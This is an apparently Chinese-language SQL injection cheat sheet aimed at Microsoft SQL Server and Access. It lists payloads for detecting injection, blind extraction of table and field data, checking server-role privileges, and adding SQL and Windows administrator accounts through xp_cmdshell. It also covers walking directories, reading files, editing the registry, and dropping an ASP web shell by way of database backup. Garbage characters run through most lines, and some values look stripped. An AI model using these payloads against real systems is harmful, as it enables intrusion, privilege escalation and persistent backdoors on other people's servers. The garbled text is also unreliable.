1.判断是否有注入;and 1=1 ;and 1=2 <I�I>io��;
2.初步判断是否是mssql ;and user>0 �1[e�%�E#h
@Fb
2c0�?Y
3.注入参数是字符'and [查询条件] and ''=' U6Y�Q*%mZ_
b�,#?�LdQ%
4.搜索时没过滤参数的'and [查询条件] and '%25'=' N1l^�%Yf J
byk9"QeY\�
5.判断数据库系统 }l�5Q�0�'�
�}��#Kl6�x
;and (select count(*) from sysobjects)>0 mssql XU`vs`/���
�Ve���xQ ]
;and (select count(*) from msysobjects)>0 access #*"I?B/fd8
6�MQy�r�2c
O7f"8|�=HX
9�*�(u�JA�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �TTSq�}sb}
�/E�m6+DN>
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �yO�N�X?cS
Gr~J-#a3~D
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 xv_Z$&9e>l
r�pL�]5e!
9.(1)猜字段的ascii值(access) D��!V*H?;U
p�<Vj<6.=?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]!WD">�d:�
%)y-BdSp�.
(2)猜字段的ascii值(mssql) z[]���8"C=
�w(q�\�75�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 2-�rfF�qpe
�c�Xt]5�5"
10.测试权限结构(mssql) 3Z�m;:�v4y
��o^x,JT��
KY9@���2JG
�.��:Zb��~
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- e @|uG���%
��Yi|Nd��;
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �P�L��K�;y
+�VO(6J�n�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- #mRT>]di`D
xep�p.�"�O
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <�1kK@m -E
x#�'��v}(v
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Y5�8et9gRO
�<�a&��$D�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
{s�?x
N�U
�*�YP;��HL
;and 1=(select IS_MEMBER('db_owner'));-- <p#+(�'N`�
mz��3Dt>�
8LGN�V&Edg
:��M�q{ES%
11.添加mssql和系统的帐户 ~L9I@�(/�S
3�����2K��
;exec master.dbo.sp_addlogin username;-- �\C�"hL(4-
;exec master.dbo.sp_password null,username,password;-- ;Lk0�7+�3G
�KH9�D},�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �w*g�G�1BV
+?GsIp@>jh
;exec master.dbo.xp_cmdshell 'net user username password ��WI-I+0sE
1W�{t?�1[s
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- t:t�IzFN�v
1oL3y;>iL�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Eu$h��C]�w
'~AR�|�8q?
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- A{ .�� A1
t�+A9nvj)
�=$\�9t�$A
9+I�/�bl4
12.(1)遍历目录 VH<-||X/�4
\W"p<oo|H�
;create table dirs(paths varchar(100), id int) >4nQ&��b.u
r|Q�/:UV?w
;insert dirs exec master.dbo.xp_dirtree 'c:\' |L(h+/>aWX
Q�v�1���cf
;and (select top 1 paths from dirs)>0 Gw�+pjSJL`
f�^�G�-ba�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) M^.>UZK�yl
f<��3l�xu
5a2���+�6N
P$&l1�M�p�
(2)遍历目录 O@`KG�ZEPY
�]�+�T�$�D
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- F+�<Z%KuCu
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 YGOhUT� |�
& DhdB0Hjf
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 {ukQBu#�}<
'��m.+�S�8
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 !>EK
%�O�O
Sgn<=8,6�c
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 96<���0= �
�L�U+}�iA)
Pdk�#"�H-j
�-�{N�P3zy
13.mssql中的存储过程 u��0n�Ir�9
�>Y�R2h�/S
xp_regenumvalues 注册表根键, 子键 cue�aOtD��
�\W�7pSV-U
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �E_Fm5zb?X
�x��pBQ(6Y
xp_regread 根键,子键,键值名 �#q6#�nfi"
6dhzx; ��A
;exec xp_regread I6PReVIb�
+��6:jm54�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �z[�0tM&pv
:}-iz�d)/j
xp_regwrite 根键,子键, 值名, 值类型, 值 ~�"r�(PCa@
�SZ~lCdWad
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 9hjzOJPuga
\w)ddc!�ZS
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Op�:$7�h�v
%$67*pY'JH
xp_regdeletevalue 根键,子键,值名 �okTqq=xd`
�HF*j=qt!�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 /ACau�<U]t
AYfL}�X<Ig
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 A[u�B)wWsn
|nB�Z�:$D
Z�:YgG.�z"
K?>sP%�m�)
14.mssql的backup创建webshell ��s01��=C3
RSC���Q`�.
use model M�9?f`�9��
H\$uRA oo*
create table cmd(str image); u-�*z#e_L0
S��}q�Gf%
insert into cmd(str) values (''); MhIHfW�]b�
��k}�!'��@
backup database model to disk='c:\l.asp'; v7�,�-�Q*�
wV\G��$|�Y
PW\�me7iCz
25<��q�o{
15.mssql内置函数 (S2E'L� L{
??lsv�(v-�
;and (select @@version)>0 获得Windows的版本号 �*E��+VcU
�O�+]'*�~a
;and user_name()='dbo' 判断当前系统的连接用户是不是sa =,�8�nfJ+x
Y7;=\/�SV
;and (select user_name())>0 爆当前系统的连接用户 L
�nyow}�
LIT`�~��D
;and (select db_name())>0 得到当前连接的数据库 )&l�5I4CIf
JF=�T_SH^U
t�<�"�%m)J
~i��!I6d�~
16.简洁的webshell b�*ja,I4
wCu�!dxT|,
use model t�J�my}.t1
'*�^9�'�=
create table cmd(str image); �k{U�[ U1j
����_7~q�|
insert into cmd(str) values (''); ����<'\!�
ZD4aT�1|Q7
backup database model to disk='g:\wwwtest\l.asp';
